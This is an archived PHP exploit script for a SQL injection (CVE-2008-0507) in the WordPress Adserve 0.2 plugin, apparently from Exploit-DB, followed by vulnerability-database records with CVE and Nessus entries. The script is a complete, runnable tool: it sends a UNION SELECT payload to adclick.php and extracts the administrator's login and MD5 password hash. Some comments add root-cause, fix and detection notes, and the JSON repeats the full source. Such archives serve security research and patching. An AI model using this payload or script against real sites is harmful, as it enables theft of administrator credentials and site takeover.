<?
# WordPress Adserve plugin v 0.2 Sql Injection Exploit
#
# Plugin Homepage-http://www.irisco.it/?page_id=40
#
# Found by:enter_the_dragon
#
# Vuln code
#
# -In adclick.php
#
# if (isset($_GET['id'])) {
# Header("Location: ".iri_AdServe_BannerClick($_GET['id'])
#
# -In iri_AdServe_BannerClick function
#
# return $wpdb->get_var("SELECT url FROM $table_name WHERE id=$id;");
#
# Root cause (defender's view): the request parameter reaches the SQL string
# by interpolation in a numeric context ("WHERE id=$id"), so quote-escaping
# such as magic_quotes_gpc gives no protection. The usual fix is to cast the
# value before use ((int)$id) or to build the statement with $wpdb->prepare().
# Because the query result is then echoed back verbatim in the Location
# header, any value the query returns is visible to the requester.
#
# Exploit
#
# id variable isn't filtered so we can inject and check the output in the Location response-header
# If exploit is successful Wordpress administrators login and md5 hashed password is retrieved
#
# Detection note: this activity appears in web-server access logs as a
# request to wp-content/plugins/wp-adserve/adclick.php whose id parameter
# contains "union"/"select", answered with a 302 whose Location carries
# pipe-delimited values instead of a URL.
#
echo "\n";
echo "-------WordPress Adserve plugin v 0.2 Sql Injection Exploit-------"."\n";
echo "-------------------coded by : enter_the_dragon--------------------"."\n";
echo "------------------------------------------------------------------"."\n";
# Exactly two arguments are required: host and WordPress path.
# NOTE(review): the path is concatenated as-is, so it must end with "/"
# for the plugin URL below to resolve.
if ($argc!=3)
{
echo " Usage: $argv[0] target_host wp_path \n";
echo " target_host: Your target ex www.target.com \n";
echo " wp_path: WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";
echo "\n";
exit;
}
# Build the request URL: host + path + plugin script + id payload.
# The 0x7c (pipe) separators in the payload are what the regex below keys on.
$query=$argv[1];
$query.=$argv[2];
$query.="wp-content/plugins/wp-adserve/adclick.php?";
$query.="id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users";
# NOTE(review): curl_init is passed as an unquoted identifier here, which
# relied on old PHP treating an undefined constant as its own name.
if(function_exists(curl_init))
{
# CURLOPT_HEADER is required because the data of interest is in the
# Location response header, not the body; no redirect-following is set,
# so the 302 itself is returned.
$ch = curl_init("http://$query");
curl_setopt($ch, CURLOPT_HEADER,true);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_TIMEOUT,10);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
$html=curl_exec($ch);
$returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);
# Only a 302 is treated as a hit; any other status (including a timeout,
# where $returncode is 0) is reported as failure.
if($returncode==302)
{
# Match "|<login>|<32 hex chars>|"; group 2 is the hash column value.
$pattern="/\|(.*)?\|([a-z0-9]{32})\|/";
if(preg_match($pattern,$html,$matches))
{
$adminusername=$matches[1];
$adminpass=$matches[2];
echo "Admin Login:$adminusername\n" ;
echo "Admin Pass :$adminpass\n";
}
# NOTE(review): a 302 whose headers do not match the pattern prints nothing.
}
else
{
exit ("Exploit Failed :( \n");
}
}
else
exit("Error:Libcurl isnt installed \n");
?>
# milw0rm.com [2008-01-30]
{"id": "EDB-ID:5013", "published": "2008-01-30T00:00:00", "sourceHref": "https://www.exploit-db.com/download/5013/", "edition": 1, "title": "WordPress Plugin Adserve 0.2 - adclick.php SQL Injection Exploit", "sourceData": "<?\n# WordPress Adserve plugin v 0.2 Sql Injection Exploit \n#\n# Plugin Homepage-http://www.irisco.it/?page_id=40\n# \t\n# Found by:enter_the_dragon\n# \n\n# Vuln code\n#\n# -In adclick.php\n#\n# if (isset($_GET['id'])) {\n# Header(\"Location: \".iri_AdServe_BannerClick($_GET['id'])\n#\t\n# -In iri_AdServe_BannerClick function\n# \n# \treturn $wpdb->get_var(\"SELECT url FROM $table_name WHERE id=$id;\"); \n#\n#\n# \n\n# Exploit\n# \n# id variable isnt filtered so we can inject and check the output in the Location response-header \n# If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved\n#\n# \n\n\n\n\necho \"\\n\";\necho \"-------WordPress Adserve plugin v 0.2 Sql Injection Exploit-------\".\"\\n\";\necho \"-------------------coded by : enter_the_dragon--------------------\".\"\\n\";\necho \"------------------------------------------------------------------\".\"\\n\";\nif ($argc!=3)\n{\necho \" Usage:\t$argv[0] target_host wp_path \\n\";\necho \" target_host:\tYour target ex www.target.com \\n\";\necho \" wp_path:\tWordPress path ex /blog/ or / if wordpress is installed in the web servers root folder\";\t \necho \"\\n\";\nexit;\n}\n\n\n$query=$argv[1];\n$query.=$argv[2];\n$query.=\"wp-content/plugins/wp-adserve/adclick.php?\";\n$query.=\"id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users\";\n\n \nif(function_exists(curl_init))\n{\n $ch = curl_init(\"http://$query\");\n curl_setopt($ch, CURLOPT_HEADER,true);\n curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);\n curl_setopt($ch, CURLOPT_TIMEOUT,10);\n curl_setopt($ch, CURLOPT_USERAGENT, \"Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)\"); \n $html=curl_exec($ch);\n $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);\n 
curl_close($ch);\n\n if($returncode==302)\n { \n\t$pattern=\"/\\|(.*)?\\|([a-z0-9]{32})\\|/\";\n if(preg_match($pattern,$html,$matches))\n {\n $adminusername=$matches[1];\n $adminpass=$matches[2];\n\t echo \"Admin Login:$adminusername\\n\" ;\n \t echo \"Admin Pass :$adminpass\\n\";\t \n\t }\n }\t\t \n\telse \n {\n\texit (\"Exploit Failed :( \\n\");\n }\t\n\n\n}\nelse\nexit(\"Error:Libcurl isnt installed \\n\");\n\n?>\n\n# milw0rm.com [2008-01-30]\n", "bulletinFamily": "exploit", "type": "exploitdb", "cvelist": ["CVE-2008-0507"], "history": [], "description": "Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit. CVE-2008-0507. Webapps exploit for php platform", "href": "https://www.exploit-db.com/exploits/5013/", "modified": "2008-01-30T00:00:00", "hash": "ae3fef80a9cc34ae55809162dc058c3ba8da44c62b2294d1f68a619924a07f97", "lastseen": "2016-01-31T21:17:47", "osvdbidlist": ["40779"], "viewCount": 76, "reporter": "enter_the_dragon", "objectVersion": "1.0", "references": [], "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "enchantments": {"vulnersScore": 0.0}}
{"result": {"cve": [{"id": "CVE-2008-0507", "type": "cve", "title": "CVE-2008-0507", "description": "SQL injection vulnerability in adclick.php in the AdServe 0.2 plugin for WordPress allows remote attackers to execute arbitrary SQL commands via the id parameter.", "published": "2008-01-31T15:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0507", "cvelist": ["CVE-2008-0507"], "lastseen": "2017-09-29T14:25:44"}], "nessus": [{"id": "WORDPRESS_ADSERVE_ID_SQL_INJECTION.NASL", "type": "nessus", "title": "WordPress AdServe 'adclick.php' 'id' Parameter SQL Injection", "description": "The remote host is running AdServe, a third-party ad banner plugin for WordPress.\n\nThe version of AdServe installed on the remote host fails to sanitize input to the 'id' parameter of the 'adclick.php' script before using it in a database query. Regardless of PHP's 'magic_quotes_gpc' setting, an attacker may be able to exploit this issue to manipulate database queries, leading to disclosure of sensitive information, modification of data, or attacks against the underlying database.", "published": "2008-01-30T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=30129", "cvelist": ["CVE-2008-0507"], "lastseen": "2017-10-29T13:36:04"}]}}